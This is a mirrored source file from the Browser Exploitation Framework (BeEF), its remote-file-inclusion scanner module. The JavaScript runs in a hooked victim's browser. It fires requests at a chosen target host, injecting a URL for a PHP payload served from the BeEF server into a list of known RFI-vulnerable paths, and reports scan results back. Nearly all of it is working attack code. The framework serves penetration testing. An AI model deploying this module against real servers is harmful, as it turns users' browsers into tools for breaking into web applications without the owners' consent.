Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/rfi_scanner/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
  var rproto = '<%= @rproto %>';

10
  var rhost = '<%= @rhost %>'; 

11
  var rport = '<%= @rport %>';

12
  var base_dir = '<%= @base_dir %>';

13
  var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';

14
  var target = rproto + '://' + rhost + ':' + rport + base_dir;

15
  var wait = '<%= @wait %>';

16


17
  get_url = function(uri) {

18
    try {

19
      var xhr = new XMLHttpRequest();

20
      var rfi = uri.replace(/XXpathXX/g, payload_url);

21
      xhr.open('GET', target+rfi, true);

22
      xhr.onload = function () {

23
      };

24
      xhr.onreadystatechange = function () {

25
        if (xhr.readyState == 4 && xhr.status == 200) {

26
          beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);

27
        }

28
      }

29
      xhr.send(null);

30
    } catch (e){

31
      beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);

32
    }

33
  }

34


35
  // add scripts to queue

36
  var requests = new Array(

37
<%=

38
  scripts = []

39
  File.open("#{$root_dir}/modules/exploits/rfi_scanner/rfi.txt", 'r') do |file_handle|

40
    file_handle.each_line do |line|

41
      uri = line.chomp!

42
      next if uri =~ /^#/

43
      next if uri.nil?

44
      next if uri !~ /XXpathXX/

45
      scripts << "'#{uri.gsub("'", "\\\\'")}'"

46
    end

47
  end

48
  scripts.shuffle.join(",\n")

49
%>

50
);

51


52
  // process queue

53
  beef.debug("[command #<%= @command_id %>] Starting RFI scan of "+target+" ("+requests.length+" URLs)");

54
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");

55
  var timeout = wait * requests.length + 10;

56
  var handle = setInterval(function() {

57
    if (requests.length > 0) {

58
      get_url(requests.pop());

59
    } else cleanup();

60
  }, wait*1000);

61


62
  // clean up

63
  cleanup = function() {

64
    if (handle) {

65
      beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");

66
      clearInterval(handle);

67
      handle = 0;

68
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");

69
    }

70
  }

71
  setTimeout("cleanup();", timeout*1000);

72


73
});

74


75